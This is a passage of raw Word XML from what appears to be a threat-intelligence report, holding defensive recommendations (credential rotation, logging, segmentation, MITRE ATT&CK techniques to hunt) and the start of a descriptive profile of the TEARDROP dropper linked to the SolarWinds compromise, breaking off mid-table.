    <w:p w14:paraId="35B783E0" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rotate privileged credentials </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4B074F" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable unused accounts </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456440DC" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3. Monitor Router Integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321905A0" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F98C77" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">File integrity monitoring </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748E73B0" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Daemon validation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F92B90" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rootkit detection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D08FA45" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4. Improve Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C76036D" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E6F0D" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Centralized syslog collection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A70257" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Immutable logging </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03119B6D" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CLI command auditing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55845394" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5. Network Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50872A56" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Separate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C70005A" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Management networks </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA781B" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical routing infrastructure </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E5D94" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrative interfaces </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608D253" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6. Threat Hunting Using MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B79B901" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Focus on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BB4910" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1055 (Process Injection) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE9B4B" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1014 (Rootkit) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC853B9" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1090.003 (Multi-hop Proxy) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240EB59" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001A1788">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T1040 (Network Sniffing) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F919B03" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7. Detect Living-off-the-Network Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF4884C" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00B42FCF">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Because attackers abused legitimate infrastructure components, defenders should prioritize behavioral analytics over signature-only detection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6469B1" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABF112E" w14:textId="74BC9058" w:rsidR="0055266B" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A082887" w14:textId="4659B99D" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Teardrop </w:t>
      </w:r>
      <w:r w:rsidR="00AC4402" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0560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1"/>
        <w:gridCol w:w="8917"/>
      </w:tblGrid>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="7EEE178D" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5196946F" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18C955D2" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="5B4B785E" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F0A7A41" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2000D72C" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>TEARDROP (S0560)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Memory-resident Dropper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="16334C5E" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79558FA1" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6273F964" w14:textId="77777777" w:rsidR="00175DEC" w:rsidRPr="003168F2" w:rsidRDefault="00175DEC" w:rsidP="00175DEC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>TEARDROP is a memory-only dropper associated with the SolarWinds supply-chain compromise. It deploys second-stage payloads such as Cobalt Strike beacons while avoiding disk-based detection mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175DEC" w:rsidRPr="003168F2" w14:paraId="051D4EB0" w14:textId="77777777" w:rsidTr="00175DEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
